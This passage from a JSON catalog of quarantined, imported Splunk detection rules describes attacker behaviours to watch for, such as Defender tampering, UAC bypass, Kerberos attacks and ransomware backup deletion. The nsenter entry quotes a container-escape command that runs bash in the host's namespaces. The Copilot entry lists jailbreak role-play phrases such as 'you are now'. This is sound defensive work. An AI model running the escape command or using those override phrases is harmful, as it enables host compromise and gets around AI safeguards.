"detections/splunk-imports/_quarantine/detect-path-interception-by-creation-of-program-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cbef820c-e1ff-407f-887f-0a9240a2d477", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_path_interception_by_creation_of_program_exe.yml" } }, { "id": "splunk-security-content-cc1448e3-cc7a-4518-bc9f-2fa48f61a22b", "type": "detection", "name": "Kubernetes Shell Running on Worker Node with CPU Activity", "description": "The following analytic identifies shell activity within the Kubernetes privilege scope on a worker node, specifically when shell processes are consuming CPU resources. It leverages process metrics from an OTEL collector hostmetrics receiver, pulled from Splunk Observability Cloud via the Splunk Infrastructure Monitoring Add-on, focusing on process.cpu.utilization and process.memory.utilization. This activity is significant as unauthorized shell processes can indicate a security threat, potentially compromising the node and the entire Kubernetes cluster. If confirmed malicious, attackers could gain full control over the host's resources, leading to data theft, service disruption, privilege escalation, and further attacks within the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-shell-running-on-worker-node-with-cpu-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc1448e3-cc7a-4518-bc9f-2fa48f61a22b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_shell_running_on_worker_node_with_cpu_activity.yml" } }, { "id": "splunk-security-content-cc26aba8-7f4a-4078-b91a-052d6a53cb13", "type": "detection", "name": "M365 Copilot Impersonation Jailbreak Attack", "description": "Detects M365 Copilot impersonation and roleplay jailbreak attempts where users try to manipulate the AI into adopting alternate personas, behaving as unrestricted entities, or impersonating malicious AI systems to bypass safety controls. The detection searches exported eDiscovery prompt logs for roleplay keywords like \"pretend you are,\" \"act as,\" \"you are now,\" \"amoral,\" and \"roleplay as\" in the Subject_Title field. Prompts are categorized into specific impersonation types (AI_Impersonation, Malicious_AI_Persona, Unrestricted_AI_Persona, etc.) to identify attempts to override the AI's safety guardrails through persona injection attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-impersonation-jailbreak-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc26aba8-7f4a-4078-b91a-052d6a53cb13", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_impersonation_jailbreak_attack.yml" } }, { "id": "splunk-security-content-cc2a3425-2703-47e7-818f-3dca1b0bc56f", "type": "detection", "name": "Windows Impair Defense Set Win Defender Smart Screen Level To Warn", "description": "The following analytic detects modifications to the Windows registry that set the Windows Defender SmartScreen level to \"warn.\" This detection leverages data from the Endpoint.Registry data model, specifically monitoring changes to the ShellSmartScreenLevel registry value. This activity is significant because altering SmartScreen settings to \"warn\" can reduce immediate suspicion from users, allowing potentially malicious executables to run with just a warning prompt. If confirmed malicious, this could enable attackers to execute harmful files, increasing the risk of successful malware deployment and subsequent system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-set-win-defender-smart-screen-level-to-warn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc2a3425-2703-47e7-818f-3dca1b0bc56f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_set_win_defender_smart_screen_level_to_warn.yml" } }, { "id": "splunk-security-content-cc316032-924a-11eb-91a2-acde48001122", "type": "detection", "name": "DSQuery Domain Discovery", "description": "The following analytic detects the execution of \"dsquery.exe\" with arguments targeting `TrustedDomain` queries directly from the command line. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process names and command-line arguments. This activity is significant as it often indicates domain trust discovery, a common step in lateral movement or privilege escalation by adversaries. If confirmed malicious, this could allow attackers to map domain trusts, potentially leading to further exploitation and unauthorized access to trusted domains.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dsquery-domain-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc316032-924a-11eb-91a2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/dsquery_domain_discovery.yml" } }, { "id": "splunk-security-content-cc391750-3024-11ec-955a-acde48001122", "type": "detection", "name": "Disable Defender MpEngine Registry", "description": "The following analytic detects the modification of the Windows Defender MpEngine registry value, specifically setting MpEnablePus to 0x00000000. This detection leverages endpoint registry logs, focusing on changes within the path \"*\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\MpEngine*\". This activity is significant as it indicates an attempt to disable key Windows Defender features, potentially allowing malware to evade detection. If confirmed malicious, this could lead to undetected malware execution, persistence, and further system compromise. Immediate investigation and endpoint isolation are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-defender-mpengine-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc391750-3024-11ec-955a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_defender_mpengine_registry.yml" } }, { "id": "splunk-security-content-cc590c66-f65f-48f2-986a-4797244762f8", "type": "detection", "name": "Detect Software Download To Network Device", "description": "The following analytic identifies unauthorized software downloads to network devices via TFTP, FTP, or SSH/SCP. It detects this activity by analyzing network traffic events on specific ports (69, 21, 22) from devices categorized as network, router, or switch. This activity is significant because adversaries may exploit netbooting to load unauthorized operating systems, potentially compromising network integrity. If confirmed malicious, this could lead to unauthorized control over network devices, enabling further attacks, data exfiltration, or persistent access within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1542.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-software-download-to-network-device.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc590c66-f65f-48f2-986a-4797244762f8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_software_download_to_network_device.yml" } }, { "id": "splunk-security-content-cc695238-3117-4e60-aa83-4beac2a42c69", "type": "detection", "name": "Cisco NVM - Curl Execution With Insecure Flags", "description": "This analytic detects the use of `curl.exe` with insecure flags such as `-k`, `--insecure`, `--proxy-insecure`, or `--doh-insecure`\nwhich disable TLS certificate validation.\nIt leverages Cisco Network Visibility Module (NVM) flow data and process arguments\nto identify outbound connections initiated by curl where TLS checks were explicitly disabled.\nThis behavior may indicate an attempt to bypass certificate validation to connect to potentially untrusted or malicious endpoints,\na common tactic in red team operations, malware staging, or data exfiltration over HTTPS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-curl-execution-with-insecure-flags.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc695238-3117-4e60-aa83-4beac2a42c69", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___curl_execution_with_insecure_flags.yml" } }, { "id": "splunk-security-content-cca37478-8377-11ec-b59a-acde48001122", "type": "detection", "name": "Rubeus Command Line Parameters", "description": "The following analytic detects the use of Rubeus command line parameters, a toolset for Kerberos attacks within Active Directory environments. It leverages Endpoint Detection and Response (EDR) data to identify specific command-line arguments associated with actions like ticket manipulation, kerberoasting, and password spraying. This activity is significant as Rubeus is commonly used by adversaries to exploit Kerberos for privilege escalation and lateral movement. If confirmed malicious, this could lead to unauthorized access, persistence, and potential compromise of sensitive information within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550.003", "T1558.003", "T1558.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rubeus-command-line-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cca37478-8377-11ec-b59a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rubeus_command_line_parameters.yml" } }, { "id": "splunk-security-content-ccad96d7-a48c-4f13-8b9c-9f6a31cba454", "type": "detection", "name": "Detect Remote Access Software Usage FileInfo", "description": "The following analytic detects the execution of processes with file or code signing attributes from known remote access software within the environment. It leverages Sysmon EventCode 1 data and cross-references a lookup table of remote access utilities such as AnyDesk, GoToMyPC, LogMeIn, and TeamViewer. This activity is significant as adversaries often use these tools to maintain unauthorized remote access. If confirmed malicious, this could allow attackers to persist in the environment, potentially leading to data exfiltration or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-fileinfo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccad96d7-a48c-4f13-8b9c-9f6a31cba454", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_remote_access_software_usage_fileinfo.yml" } }, { "id": "splunk-security-content-ccb98a66-5851-11ec-b91c-acde48001122", "type": "detection", "name": "MSI Module Loaded by Non-System Binary", "description": "The following analytic detects the loading of `msi.dll` by a binary not located in `system32`, `syswow64`, `winsxs`, or `windows` directories. This is identified using Sysmon EventCode 7, which logs DLL loads, and filters out legitimate system paths. This activity is significant as it may indicate exploitation of CVE-2021-41379 or DLL side-loading attacks, both of which can lead to unauthorized system modifications. If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/msi-module-loaded-by-non-system-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccb98a66-5851-11ec-b91c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/msi_module_loaded_by_non_system_binary.yml" } }, { "id": "splunk-security-content-ccc3246a-daa1-11ea-87d0-0242ac130022", "type": "detection", "name": "Detect GCP Storage access from a new IP", "description": "The following analytic identifies access to GCP Storage buckets from new or previously unseen remote IP addresses. It leverages GCP Storage bucket-access logs ingested via Cloud Pub/Sub and compares current access events against a lookup table of previously seen IP addresses. This activity is significant as it may indicate unauthorized access or potential reconnaissance by an attacker. If confirmed malicious, this could lead to data exfiltration, unauthorized data manipulation, or further compromise of the GCP environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-gcp-storage-access-from-a-new-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccc3246a-daa1-11ea-87d0-0242ac130022", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_gcp_storage_access_from_a_new_ip.yml" } }, { "id": "splunk-security-content-ccd6a38c-d40b-11eb-85a5-acde48001122", "type": "detection", "name": "Allow Network Discovery In Firewall", "description": "The following analytic detects a suspicious modification to the firewall to allow network discovery on a machine. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving the 'netsh' command to enable network discovery. This activity is significant because it is commonly used by ransomware, such as REvil and RedDot, to discover and compromise additional machines on the network. If confirmed malicious, this could lead to widespread file encryption across multiple hosts, significantly amplifying the impact of the ransomware attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/allow-network-discovery-in-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccd6a38c-d40b-11eb-85a5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/allow_network_discovery_in_firewall.yml" } }, { "id": "splunk-security-content-cce357cf-43a4-494a-814b-67cea90fe990", "type": "detection", "name": "Kubernetes Pod With Host Network Attachment", "description": "The following analytic detects the creation or update of a Kubernetes pod with host network attachment. It leverages Kubernetes Audit logs to identify pods configured with host network settings. This activity is significant for a SOC as it could allow an attacker to monitor all network traffic on the node, potentially capturing sensitive information and escalating privileges. If confirmed malicious, this could lead to unauthorized access, data breaches, and service disruptions, severely impacting the security and integrity of the Kubernetes environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-pod-with-host-network-attachment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cce357cf-43a4-494a-814b-67cea90fe990", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_pod_with_host_network_attachment.yml" } }, { "id": "splunk-security-content-cce58e2c-988a-4319-9390-0daa9eefa3cd", "type": "detection", "name": "Windows Bypass UAC via Pkgmgr Tool", "description": "The following analytic detects the execution of the deprecated 'pkgmgr.exe' process with an XML input file, which is unusual and potentially suspicious. This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process execution details and command-line arguments. The significance lies in the deprecated status of 'pkgmgr.exe' and the use of XML files, which could indicate an attempt to bypass User Account Control (UAC). If confirmed malicious, this activity could allow an attacker to execute commands with elevated privileges, leading to potential system compromise and unauthorized changes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bypass-uac-via-pkgmgr-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cce58e2c-988a-4319-9390-0daa9eefa3cd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bypass_uac_via_pkgmgr_tool.yml" } }, { "id": "splunk-security-content-cce82b81-c716-4b6c-bac9-33e6a6925cc2", "type": "detection", "name": "Windows Wmic Network Discovery", "description": "The following analytic detects the execution of Windows Management Instrumentation Command-line (WMIC) commands used for network interface discovery on a Windows system. Specifically, it identifies commands such as \u201cwmic nic\u201d that retrieve detailed information about the network adapters installed on the device. While these commands are commonly used by IT administrators for legitimate network inventory and diagnostics, they can also be leveraged by malicious actors for reconnaissance, enabling them to map network configurations and identify potential targets. Monitoring WMIC network interface queries allows security teams to detect suspicious or unauthorized enumeration activities, supporting early threat identification and response.\u00df", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmic-network-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cce82b81-c716-4b6c-bac9-33e6a6925cc2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmic_network_discovery.yml" } }, { "id": "splunk-security-content-ccf4b61b-1b26-4f2e-a089-f2009c569c57", "type": "detection", "name": "Windows Binary Proxy Execution Mavinject DLL Injection", "description": "The following analytic detects the use of mavinject.exe for DLL injection into running processes, identified by specific command-line parameters such as /INJECTRUNNING and /HMODULE. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because it indicates potential arbitrary code execution, a common tactic for malware deployment and persistence. If confirmed malicious, this could allow attackers to execute unauthorized code, escalate privileges, and maintain persistence within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.013" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-binary-proxy-execution-mavinject-dll-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccf4b61b-1b26-4f2e-a089-f2009c569c57", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_binary_proxy_execution_mavinject_dll_injection.yml" } }, { "id": "splunk-security-content-ccf6b7a3-bd39-4bc9-a949-143a8d640dbc", "type": "detection", "name": "CrushFTP Server Side Template Injection", "description": "This analytic is designed to identify attempts to exploit a server-side template injection vulnerability in CrushFTP, designated as CVE-2024-4040. This severe vulnerability enables unauthenticated remote attackers to access and read files beyond the VFS Sandbox, circumvent authentication protocols, and execute arbitrary commands on the affected server. The issue impacts all versions of CrushFTP up to 10.7.1 and 11.1.0 on all supported platforms. It is highly recommended to apply patches immediately to prevent unauthorized access to the system and avoid potential data compromises. The search specifically looks for patterns in the raw log data that match the exploitation attempts, including READ or WRITE actions, and extracts relevant information such as the protocol, session ID, user, IP address, HTTP method, and the URI queried. It then evaluates these logs to confirm traces of exploitation based on the presence of specific keywords and the originating IP address, counting and sorting these events for further analysis.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crushftp-server-side-template-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccf6b7a3-bd39-4bc9-a949-143a8d640dbc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/crushftp_server_side_template_injection.yml" } }, { "id": "splunk-security-content-ccfeddec-43ec-11ec-b494-acde48001122", "type": "detection", "name": "Windows InstallUtil Credential Theft", "description": "The following analytic detects instances where the Windows InstallUtil.exe binary loads `vaultcli.dll` and `Samlib.dll`. This detection leverages Sysmon EventCode 7 to identify these specific DLL loads. This activity is significant because it can indicate an attempt to execute code that bypasses application control and captures credentials using tools like Mimikatz. If confirmed malicious, this behavior could allow an attacker to steal credentials, potentially leading to unauthorized access and further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-installutil-credential-theft.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccfeddec-43ec-11ec-b494-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_installutil_credential_theft.yml" } }, { "id": "splunk-security-content-cd07120d-4265-481a-ba0f-3b91fbc5a02f", "type": "detection", "name": "Cisco Isovalent - Nsenter Usage in Kubernetes Pod", "description": "This analytic detects the execution of the nsenter utility from within a container, a technique often used for exploitation and container escape. Nsenter allows an attacker to enter the namespaces of another process\u2014such as the host's init process (PID 1)\u2014and execute a shell or other binaries with elevated privileges. For example, an attacker may use docker exec to gain a shell in a container, enumerate the PID of a target container or the host, and then use nsenter to access all namespaces (mount, UTS, IPC, net, pid) of the host or another container. Example to escape to the host: `nsenter --target 1 --mount --uts --ipc --net --pid -- bash`. The WorkloadAncestorsBinary field is used to track the ancestry of the process, this is useful to understand the context of the nsenter usage.\n\nThe options -m -u -n -i -p correspond to the various Linux namespaces. Adversaries exploit nsenter when pods are misconfigured with excessive privileges (e.g., privileged, hostPID, or broad hostPath mounts), enabling them to interact with the underlying node filesystem and processes. This can be an indicator of a container escape attempt or privilege escalation. Security teams should pay close attention to any nsenter invocation from within containers, especially outside of normal maintenance activity or in workloads with elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-nsenter-usage-in-kubernetes-pod.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cd07120d-4265-481a-ba0f-3b91fbc5a02f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___nsenter_usage_in_kubernetes_pod.yml" } }, { "id": "splunk-security-content-cd0e816f-f67d-4dbe-a153-480b546e867e", "type": "detection", "name": "Cisco NVM - Suspicious File Download via Headless Browser", "description": "This analytic identifies the use of Chromium-based browsers (like Microsoft Edge) running in headless mode with the `--dump-dom` argument.\nThis behavior has been observed in attack campaigns such as DUCKTAIL, where browsers are automated to stealthily download content from the internet using direct URLs or suspicious hosting platforms.\nThe detection focuses on identifying connections to known file-sharing domains or direct IPs extracted from command-line arguments and cross-checks those against the destination of the flow.\nSince it leverages Cisco Network Visibility Module telemetry, the rule triggers only if a network connection is made.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-suspicious-file-download-via-headless-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cd0e816f-f67d-4dbe-a153-480b546e867e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___suspicious_file_download_via_headless_browser.yml" } }, { "id": "splunk-security-content-cd15c0a8-470e-4b12-9517-046e4927db30", "type": "detection", "name": "O365 Mailbox Folder Read Permission Granted", "description": "The following analytic identifies instances where read permissions are granted to mailbox folders within an Office 365 environment. It detects this activity by monitoring the `o365_management_activity` data source for the `Set-MailboxFolderPermission` and `Add-MailboxFolderPermission` operations. This behavior is significant as it may indicate unauthorized access or changes to mailbox folder permissions, potentially exposing sensitive email content. If confirmed malicious, an attacker could gain unauthorized access to read email communications, leading to data breaches or information leakage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-mailbox-folder-read-permission-granted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cd15c0a8-470e-4b12-9517-046e4927db30", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_mailbox_folder_read_permission_granted.yml" } }, { "id": "splunk-security-content-cd2cf33c-9201-11eb-a10a-acde48001122", "type": "detection", "name": "Disable Registry Tool", "description": "The following analytic detects modifications to the Windows registry aimed at disabling the Registry Editor (regedit). It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools\" with a value of \"0x00000001\". This activity is significant because malware, such as RATs or trojans, often disable registry tools to prevent the removal of their entries, aiding in persistence and defense evasion. If confirmed malicious, this could hinder incident response efforts and allow the attacker to maintain control over the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-registry-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cd2cf33c-9201-11eb-a10a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_registry_tool.yml" } }, { "id": "splunk-security-content-cd5aed7e-5cea-11eb-ae93-0242ac130002", "type": "detection", "name": "WBAdmin Delete System Backups", "description": "The following analytic detects the execution of wbadmin.exe with flags that delete backup files, specifically targeting catalog or system state backups. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because it is commonly used by ransomware to prevent recovery by deleting system backups. If confirmed malicious, this action could severely hinder recovery efforts, leading to prolonged downtime and potential data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wbadmin-delete-system-backups.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 